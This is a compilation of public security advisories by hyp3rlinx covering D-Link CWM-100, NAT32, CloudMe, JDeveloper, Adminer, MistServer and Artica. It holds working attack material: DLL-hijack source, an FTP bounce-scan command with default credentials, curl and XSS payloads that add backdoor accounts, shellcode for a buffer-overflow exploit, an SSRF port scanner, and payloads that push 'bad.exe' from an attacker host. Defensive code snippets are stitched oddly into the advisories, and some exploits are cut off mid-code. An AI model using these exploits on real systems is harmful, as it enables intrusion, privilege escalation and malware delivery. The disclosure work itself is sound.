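        addr = ipaddress.ip_address(resolve(host))
    except (OSError, ValueError):
        errors.append("host does not resolve")
    else:
        if addr.is_loopback or addr.is_link_local or addr.is_unspecified:
            errors.append("host resolves to a loopback/link-local address")
    return errors

def mail_connect_safe(host, port, configured_host,
                      resolve=socket.gethostbyname, connect=mail_connect_unsafe):
    """Only probe the admin-configured server on an SMTP port; otherwise refuse
    before any socket is opened, so the endpoint cannot serve as a port scanner."""
    errors = validate_mail_target(host, port, configured_host, resolve)
    if errors:
        return "REJECTED: " + "; ".join(errors)
    return connect(host, port)
```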



[Network Access]
Remote



[Severity]
Medium



[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 
10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx


D-LINK Central WifiManager CWM-100 Trojan File SYSTEM Privilege Escalation CVE-2018-15515

2018-11-19 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec  
 

***Greetz: indoushka | Eduardo B.***



[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link’s free Central WiFiManager is a web-based wireless Access Point 
management tool, enabling you to create and manage multi-site, multi-tenancy 
wireless networks.


[Vulnerability Type]
Trojan File SYSTEM Privilege Escalation


[Affected Component]
"quserex.dll"


[CVE Reference]
CVE-2018-15515


[Security Issue]
D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan horse 
"quserex.dll" and will create a new thread running with SYSTEM integrity.


[Impact]
Code Execution as SYSTEM


[Exploit/POC]
1) Create a 32-bit DLL named "quserex.dll" and place it in the "CaptivelPortal.exe" 
directory under the DLINK directory

2) Restart the service "CaptivelPortal"

3) Proof: examine it using Process Monitor (Sysinternals)


#include <windows.h>

/* hyp3rlinx */

/*
gcc -c -m32 quserex.c
gcc -shared -m32 -o quserex.dll quserex.o
*/

/* Proof-of-concept payload: a message box makes the load visible. */
void executo(void){
    MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK);
}

/* Runs whenever the host process attaches or detaches the DLL or a thread. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    (void)hinstDLL;
    (void)lpvReserved;
    switch(fdwReason){
        case DLL_PROCESS_ATTACH:
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            executo();
            break;
    }
    return TRUE;
}



[Network Access]
Local



[Severity]
High



[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 
10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure





D-LINK Central WifiManager CWM-100 FTP Server PORT Bounce Scan CVE-2018-15516

2018-11-19 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-FTP-SERVER-PORT-BOUNCE-SCAN.txt
[+] ISR: ApparitionSec  
 

***Greetz: indoushka | Eduardo B.***


[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link’s free Central WiFiManager is a web-based wireless Access Point 
management tool, enabling you to create and manage multi-site, multi-tenancy 
wireless networks.


[Vulnerability Type]
FTP Server PORT Bounce Scan


[CVE Reference]
CVE-2018-15516


[Security Issue]
The FTP Server component of the D-LINK Central WifiManager can be used as a 
man-in-the-middle machine, allowing PORT command bounce scan attacks.
This vulnerability allows remote attackers to abuse your network and discreetly 
conduct network port scanning. Victims will then think these
scans are originating from the D-LINK network running the afflicted FTP Server 
rather than from the attacker's own host.


[Exploit/POC]
D-LINK CWM-100 FTP Server listens on port 9000 (default), default creds are 
"admin" "admin"

nmap -v -b admin:admin@VICTIM-IP:9000 -p 21,22,23,53,445
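A bounce scan works because the server opens the data connection to whatever address the PORT command names. The standard server-side defence, shown as an added example (mine, not D-Link's code; function names are assumptions), is to parse the RFC 959 PORT argument and refuse any target that is not the control connection's peer or that names a privileged port.

```python
import ipaddress

class FtpCommandError(ValueError):
    """Raised for a PORT argument the server must refuse."""

def parse_port_command(arg):
    """Parse the RFC 959 PORT argument 'h1,h2,h3,h4,p1,p2' into ('h1.h2.h3.h4', p1*256+p2)."""
    fields = arg.strip().split(",")
    if len(fields) != 6:
        raise FtpCommandError("PORT needs six comma-separated fields")
    try:
        nums = [int(f) for f in fields]
    except ValueError:
        raise FtpCommandError("PORT fields must be decimal integers") from None
    if any(n < 0 or n > 255 for n in nums):
        raise FtpCommandError("PORT fields must be in 0..255")
    return ".".join(str(n) for n in nums[:4]), nums[4] * 256 + nums[5]

def check_port_command(arg, control_peer_ip):
    """Bounce-scan defence: the data connection may only go back to the host that
    opened the control connection, and never to a privileged port. Returns (ip, port)."""
    ip, port = parse_port_command(arg)
    if ipaddress.ip_address(ip) != ipaddress.ip_address(control_peer_ip):
        raise FtpCommandError(f"data host {ip} differs from control peer {control_peer_ip}")
    if port < 1024:
        raise FtpCommandError(f"refusing privileged data port {port}")
    return ip, port

def handle_port(arg, control_peer_ip):
    """Reply a hardened server gives to PORT (the affected server accepts any target)."""
    try:
        ip, port = check_port_command(arg, control_peer_ip)
    except FtpCommandError as e:
        return f"500 Illegal PORT command ({e})"
    return f"200 PORT command successful ({ip}:{port})"
```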


[POC Video URL]
https://vimeo.com/299797225


[Network Access]
Remote



[Severity]
Medium



[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 
10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure





NAT32 Build (22284) Remote Code Execution CVE-2018-6940 (hyp3rlinx / apparition security)

2018-02-14 Thread apparitionsec
[+] Credits: hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt
[+] ISR: Apparition Security

[-_-] D1rty0tis
 

Vendor:
=
www.nat32.com


Product:
=
NAT32 Build (22284)


NAT32 is a versatile IP Router implemented as a WIN32 application.


Vulnerability Type:
===
Remote Command Execution 


CVE Reference:
==
CVE-2018-6940


Security Issue:

NAT32 listens on Port 8080 for its Web interface.

C:\>netstat -ano | findstr 8080
  TCP    0.0.0.0:8080    0.0.0.0:0    LISTENING    3720


If the 'Password Checking' (BASIC authentication) feature is NOT enabled (the user 
must select it under the config tab), then remote attackers who can reach
NAT32 can potentially execute arbitrary commands. If authentication is enabled 
they will get an 'Unauthorized' server reply; however, read on ...

e.g.

Add user account.

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add;


run start net user D1rty0Tis abc123 /add Done



If the NAT32 'Password Checking' feature IS enabled, remote attackers can STILL 
potentially issue arbitrary commands by exploiting a
Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated 
NAT32 users click a malicious link
or visit an attacker-controlled webpage. 

Also worth mentioning: NAT32 implements BASIC authentication, which passes 
Base64-encoded credentials that can easily be
revealed if sniffed on the network.

When 'Password Checking' is enabled, attackers using Ajax calls via XSS would 
need to use a combination of '%0D%0A' and double encoding
to deal with white-space in order for the payload to stay intact.

%25 for the '%' sign followed by 20 (%2520) decodes to %20; using %20 or %2B 
directly will not cut it, however '%0D%0A' (CRLF) and '%2520' encoding serves us well.

NAT32 has an interesting command 'EXECR' that can allow attackers to capture 
the command output response from the server, to see right away whether an
attack was successful or not.

e.g.

Add account and get response (EXECR)

HTTP Response:


The command completed successfully.

execr net user D1rty0Tis abc123 /add Done



The NAT32 'winroute' Command will return host route information.

XSS response

e.g.



Destination     Mask            Nexthop         Metric IfIndex Type Proto Age
0.0.0.0 0.0.0.0 192.168.1.210   b4 3 21:41 [min:sec]
127.0.0.0   255.0.0.0   127.0.0.1  306  13 3 22:04 [min:sec]
127.0.0.1   255.255.255.255 127.0.0.1  306  13 3 22:04 [min:sec]
127.255.255.255 255.255.255.255 127.0.0.1  306  13 3 22:04 [min:sec]



Exploit/POC:
=
NAT32 Password Checking not enabled...

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add;


NAT32 BASIC authentication enabled use XSS...

Add backdoor account and capture CMD output using NAT32 'execr' shell command.
http://x.x.x.x:8080/shell?cmd=var%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open('GET','http://x.x.x.x:8080/shell?cmd=execr%2520net%2520user%2520D1rty0Tis%2520abc123%2520/add',true);xhr.send(null);

Get Windows Routes (info disclosure):
http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E



Network Access:
===
Remote


Severity:
=
High


Disclosure Timeline:
=
Vendor Notification: February 9, 2018
Vendor acknowledgement: February 9, 2018
Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : 
February 12, 2018
www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily 
unavailable." : February 13, 2018
February 14, 2018 : Public Disclosure





CVE-2018-6892 CloudMe Sync <= v1.10.9 Unauthenticated Remote Buffer Overflow (hyp3rlinx / apparition security)

2018-02-12 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security  
[+] SSD Beyond Security Submission: 
https://blogs.securiteam.com/index.php/archives/3669


Vendor:
=
www.cloudme.com


Product:
===
CloudMe Sync <= v1.10.9

(CloudMe_1109.exe)
hash: 0e83351dbf86562a70d1999df7674aa0 

CloudMe is a file storage service operated by CloudMe AB that offers cloud 
storage, file synchronization and client software.
It features a blue folder that appears on all devices with the same content, 
all files are synchronized between devices.



Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
CVE-2018-6892



Security Issue:

Unauthenticated remote attackers that can connect to the "CloudMe Sync" client 
application listening on port 8888 can send a malicious payload causing
a Buffer Overflow condition. This will result in an attacker controlling the 
program's execution flow and allowing arbitrary code execution on the victim's PC.

CloudMe Sync client creates a socket listening on TCP Port 8888 (0x22B8)

In Qt5Core:

00564DF1   . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8
00564DF9   . 890424 MOV DWORD PTR SS:[ESP],EAX
00564DFC   . FF15 B8738100  CALL DWORD PTR DS:[<_ZN10QTc>;  
Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst


C:\>netstat -ano | findstr 8888
TCP    0.0.0.0:8888    0.0.0.0:0    LISTENING    15504
TCP    [::]:8888       [::]:0       LISTENING    15504


Buffer Overflow:

EIP register will be overwritten at about 1075 bytes.

EAX 0001
ECX 76F698DA msvcrt.76F698DA
EDX 0035
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141

Stack Dump:
==

(508.524): Access violation - code c005 (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
ntdll.dll - 
eax= ebx= ecx=41414141 edx=778f353d esi= edi=
eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
41414141 ??  ???

Exploitation is very easy, as ASLR and SafeSEH are both set to false, making the 
exploit portable and able to work across different operating systems.
We will therefore use a Structured Exception Handler overwrite for our exploit.

e.g.

6FE6909D  0x6fe6909d : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} 
[libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- 
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795  0x00476795 : pop ebx # pop esi # ret 0x20 | startnull 
{PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, 
OS: False, v-1.0- 
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6  0x61e7b7f6 : pop ebx # pop esi # ret 0x20 |  {PAGE_EXECUTE_READ} 
[Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 
(C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)


0day Exploit POC:
==
import socket,struct

print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
print 'apparition security\n'


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


ip=raw_input('[+] CloudMe Target IP> ') 

nseh="\xEB\x06"+"\x90"*2#JMP
seh=struct.pack('

Oracle JDeveloper IDE Directory Traversal CVE-2017-10273 (hyp3rlinx / apparition security)

2018-01-22 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt
[+] ISR: apparition security   
 

Vendor:
=
www.oracle.com


Product:
===
JDeveloper IDE

Oracle JDeveloper is a free integrated development environment that simplifies 
the development of Java-based
applications addressing every step of the application lifecycle.



Vulnerability Type:
===
Directory Traversal



CVE Reference:
==
CVE-2017-10273



Security Issue:

Attackers can place malicious files outside the intended target directories if a 
user is tricked into importing a corrupt .WAR or .EAR archive.
Later, attackers can potentially request these scripts/files to execute system 
commands on the affected target.


Affected versions:
11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0, 11.1.2.4.0, 12.1.3.0.0, 12.2.1.2.0


References:

http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html



Exploit/POC:
=
1) Create an evil .WAR or .EAR archive containing ../ in a path name to initiate 
directory traversal, with a script inside to execute system commands.
2) Import it into JDeveloper.
3) Files get moved outside the target directories to one of the attacker's choosing.
4) The attacker requests the malicious file contained in the target directory.

BAM!
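The fix for this class of bug is to resolve every member name against the destination before writing and abort the import when one escapes. The extractor below is an added example (mine, not Oracle's code); .WAR/.EAR files are zip archives, so it uses zipfile, and the archives it processes are constructed in memory. Function names are assumptions.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path

class UnsafeArchiveEntry(Exception):
    """An archive member that would be written outside the extraction directory."""

def safe_member_path(dest, name):
    """Resolve member `name` under `dest`; raise if it escapes. Both '/' and '\\'
    separators are normalised because archives built on Windows may contain either."""
    norm = name.replace("\\", "/")
    if norm.startswith("/") or (len(norm) > 1 and norm[1] == ":"):
        raise UnsafeArchiveEntry(f"absolute path: {name!r}")
    dest_real = Path(dest).resolve()
    target = (dest_real / norm).resolve()
    # a traversal entry such as ../../x resolves to a path that is not inside dest
    if target != dest_real and dest_real not in target.parents:
        raise UnsafeArchiveEntry(f"path escapes destination: {name!r}")
    return target

def safe_extract(archive_bytes, dest):
    """Extract a .war/.ear (a zip) held in memory into `dest`. Every member is
    validated before anything is written, so a traversal entry aborts the whole import
    instead of leaving a half-extracted archive. Returns written paths relative to dest."""
    dest_real = Path(dest).resolve()
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        members = [(info, safe_member_path(dest, info.filename)) for info in zf.infolist()]
        written = []
        for info, target in members:
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(str(target.relative_to(dest_real)))
    return written

def build_archive(entries):
    """Constructed sample archive from {member name: bytes}; zipfile stores '../' names as given."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def demo():
    """Import a clean archive, then one carrying a traversal entry, in a scratch directory.
    Returns (files written from the clean one, error for the bad one, whether anything escaped)."""
    clean = build_archive({"WEB-INF/web.xml": b"<web-app/>", "index.jsp": b"<%-- ok --%>"})
    bad = build_archive({"index.jsp": b"x", "../../escaped.jsp": b"x"})  # constructed traversal name
    with tempfile.TemporaryDirectory() as d:
        written = safe_extract(clean, d)
        try:
            safe_extract(bad, d)
            blocked = None
        except UnsafeArchiveEntry as e:
            blocked = str(e)
        escaped = os.path.exists(os.path.join(d, "..", "..", "escaped.jsp"))
    return sorted(written), blocked, escaped
```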


Network Access:
===
Local



Severity:
=
Low



Disclosure Timeline:
=
Vendor Notification: October 14, 2016
Vendor fixes as part of CPU January 16, 2018
January 17, 2018 : Public Disclosure





Adminer <= v4.3.1 Server Side Request Forgery

2018-01-15 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: apparition security   
 


Vendor:
==
www.adminer.org


Product:

Adminer <= v4.3.1 

Adminer (formerly phpMinAdmin) is a full-featured database management tool 
written in PHP. Unlike phpMyAdmin, it consists of a
single file ready to deploy to the target server. Adminer is available for 
MySQL, PostgreSQL, SQLite, MS SQL, Oracle, Firebird, SimpleDB, Elasticsearch 
and MongoDB.

https://github.com/vrana/adminer/releases/


Vulnerability Type:
===
Server Side Request Forgery


CVE Reference:
==
N/A


Security Issue:

Adminer allows unauthenticated connections to be initiated to arbitrary 
systems/ports. This vulnerability can be used to potentially bypass firewalls to
identify internal hosts and perform port scanning of other servers for 
reconnaissance purposes. Funny thing is, Adminer throttles invalid login attempts
but allows endless unauthorized HTTP connections to other systems as long as 
you're not trying to authenticate to Adminer itself.

In situations where Adminer can talk to a server that we are not allowed to reach (ACL), 
and where we can talk to the server hosting Adminer, it can do recon for us.

Recently on a LAN I was firewalled off from a server; however, I could talk to another 
server running Adminer, and that Adminer server could talk to the target.
Since Adminer suffers from Server-Side Request Forgery, I could scan for open 
ports and gather information from that firewalled-off, protected server.
This allowed me to not only bypass the ACL but also hide from the threat 
detection system (IDS) monitoring east-west connections. 

However, sysadmins who check the logs on the server hosting the Adminer application 
will see our port scans.

root@lamp log/apache2# cat other_vhosts_access.log
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:25:11 +] "GET 
///?server=TARGET-IP:21= HTTP/1.1" 403 1429 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:24 +] "GET 
///?server=TARGET-IP:22= HTTP/1.1" 403 6019 "-" "-"
localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +] "GET 
///?server=TARGET-IP:23= HTTP/1.1" 403 6021 "-" "-"
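Those log lines are the detection opportunity: one client asking Adminer to connect to the same target on several different ports in a short window is a scan, whatever the HTTP status. The detector below is an added example (mine, not Adminer's code) over Apache vhost_combined lines of the shape shown above; SAMPLE_LOG is constructed with documentation addresses and a +0000 timezone where the excerpt's copy is blank, and the function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "vhost_combined" line as in the advisory's excerpt. The timezone field is
# consumed but ignored; all lines in one log share it.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]\s]+)[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# Adminer's connection target: ?server=HOST:PORT (Adminer itself then connects there).
SERVER_RE = re.compile(r'[?&]server=(?P<host>[^&:\s"]+):(?P<port>\d{1,5})')

# Constructed sample: same shape as the excerpt above, with RFC 5737 documentation addresses.
SAMPLE_LOG = [
    'localhost:12322 203.0.113.9 - - [2/Jan/2018:14:25:11 +0000] "GET ///?server=10.10.5.7:21&username= HTTP/1.1" 403 1429 "-" "-"',
    'localhost:12322 203.0.113.9 - - [2/Jan/2018:14:26:24 +0000] "GET ///?server=10.10.5.7:22&username= HTTP/1.1" 403 6019 "-" "-"',
    'localhost:12322 203.0.113.9 - - [2/Jan/2018:14:26:56 +0000] "GET ///?server=10.10.5.7:23&username= HTTP/1.1" 403 6021 "-" "-"',
    'localhost:12322 203.0.113.9 - - [2/Jan/2018:14:27:10 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "-"',
    'localhost:12322 198.51.100.4 - - [2/Jan/2018:14:30:02 +0000] "GET /?server=db.internal:3306&username=app HTTP/1.1" 200 812 "-" "-"',
]

def parse_line(line):
    """Return client, time, target host and port of an Adminer connection request,
    or None for lines that are not Adminer 'server=' requests."""
    m = LOG_RE.match(line)
    if not m:
        return None
    s = SERVER_RE.search(m.group("path"))
    if not s:
        return None
    return {
        "client": m.group("client"),
        "time": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S"),
        "target": s.group("host"),
        "port": int(s.group("port")),
        "status": int(m.group("status")),
    }

def find_port_scans(lines, window=timedelta(minutes=10), min_ports=3):
    """Flag (client, target) pairs whose requests name at least `min_ports` distinct
    ports within `window`. One alert per pair, for the first window that trips it."""
    by_pair = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_pair[(ev["client"], ev["target"])].append(ev)
    alerts = []
    for (client, target), evs in by_pair.items():
        evs.sort(key=lambda e: e["time"])
        start = 0
        for end in range(len(evs)):          # sliding window over time-sorted events
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            ports = {e["port"] for e in evs[start:end + 1]}
            if len(ports) >= min_ports:
                alerts.append({"client": client, "target": target, "ports": sorted(ports),
                               "first": evs[start]["time"], "last": evs[end]["time"]})
                break
    return alerts
```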


Details:
==
By comparing different failed error responses from Adminer when making SSRF 
bogus connections, I figured out which ports are open/closed.

Port open ==> Lost connection to MySQL server at 'reading initial communication 
packet
Port open ==> MySQL server has gone away
Port open ==> Bad file descriptor 
Port closed ==> Can't connect to MySQL server on '';
Port closed ==> No connection could be made because the target machine actively 
refused it
Port closed ==> A connection attempt failed. 

This worked so well for me I wrote a quick port scanner 'PortMiner' as a proof 
of concept that leverages Adminer SSRF vulnerability.


PortMiner observations:
==
No response ('read operation timed out') means the port is possibly open or 
filtered and should be given a closer look if possible. This seems to occur 
when scanning
Web server ports like 80 and 443. However, when we get error responses like the 
ones above from the server, we can be fairly certain a port is either 
open or closed. 

Quick POC:
echo -e 'HTTP/1.1 200 OK\r\n\r\n' | nc -l -p 
Use range -


Exploit/POC:
=
import socket,re,ssl,warnings,subprocess,time
from platform import system as system_name 
from os import system as system_call

#Adminer Server Side Request Forgery
#PortMiner Scanner Tool
#by John Page (hyp3rlinx)
#ISR: ApparitionSec
#hyp3rlinx.altervista.org 
#=
#D1rty0Tis says hi.

#timeout
MAX_TIME=32
#ports to log
port_lst=[]  
#Web server response often times out but usually means ports open.
false_pos_ports=['80','443'] 

BANNER='''
   _   __  __ _  
  |  _  \ | | |  \/  (_) 
  | |__) |__  _ __| |_| \  / |_ _ __   ___ _ __  
  |  ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__| 
  | |  | (_) | |  | |_| |  | | | | | |  __/ |
  |_|   \___/|_|   \__|_|  |_|_|_| |_|\___|_|   

  
   '''   
   

def info():
print "\nPortMiner depends on Error messages to determine open/closed 
ports."
print "Read operations reported 'timed out' may be open/filtered.\n"


def greet():
print 'Adminer Unauthenticated SSRF Port Scanner Tool'
print 'Targets Adminer used for MySQL administration\n'
print 'by hyp3rlinx - apparition security'
print '

CVE-2017-16884 Mist Server v2.12 Unauthenticated Persistent XSS (hyp3rlinx / ApparitionSec)

2018-01-08 Thread apparitionsec
[+] Credits: John Page (aka Hyp3rlinX)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt
[+] ISR: ApparitionSec
 


Vendor:
=
mistserver.org



Product:
===
MistServer v2.12


MistServer is a full-featured, next-generation streaming media toolkit for OTT 
(internet streaming).



Vulnerability Type:
===
Unauthenticated Persistent XSS



CVE Reference:
==
CVE-2017-16884



Security Issue:

Unauthenticated remote attackers can inject persistent XSS payloads by making 
failed HTTP authentication requests. Attacker-supplied payloads will
get stored in the server logs as failed authentication alerts. 
MistServer echoes back the unsanitized payloads in MistServer's Web interface
automatically, due to the automatic refresh of the UI every few seconds, thereby 
executing arbitrary attacker-supplied code. 



References:

https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21



Exploit/POC:
=
import requests

#INJECT IFRAME
requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP\'>"}}')

#PUSH MALWARE
requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP/bad.exe\'>"}}')

#EXFIL LOGS
requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":;alert(document.body.innerHTML)"}}')



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification:  October 19, 2017
Vendor Acknowledgement : October 20, 2017
Vendor Released Fix : November 30, 2017
December 1, 2017 : Public Disclosure





CVE-2017-17055 Artica Web Proxy v3.06 Remote Code Execution (hyp3rlinx / ApparitionSec)

2018-01-08 Thread apparitionsec
[+] Credits: John Page (aka Hyp3rlinX)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec
 


Vendor:
===
www.articatech.com



Product:
=
Artica Web Proxy v.3.06.112216 


Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and 
Control solution,
usually the preserve of large companies. ARTICA PROXY Solutions have been 
developed over the past
10 years as an Open Source Project to help SMEs and public bodies protect both 
their organizations
and employees from risks posed by the Internet.



Vulnerability Type:
===
Remote Code Execution 



CVE Reference:
==
CVE-2017-17055



Security Issue:

Artica offers a web based command line emulator 'system.terminal.php' (shell), 
allowing authenticated users to execute OS commands as root. 
However, Artica fails to sanitize the HTTP request parameter 
$_GET["username-form-id"] used in 'freeradius.users.php'.

Therefore, if authenticated users click an attacker-supplied link or visit a 
malicious webpage, attacker-supplied JavaScript code can execute in their
browser, which is then used to execute unauthorized Operating 
System Commands (RCE) on the affected Artica Web Proxy Server by
abusing the system.terminal.php functionality. The result is attacker takeover of 
the Artica server.



Exploit/POC:
=
1) Steal artica Server "/etc/shadow" password file.

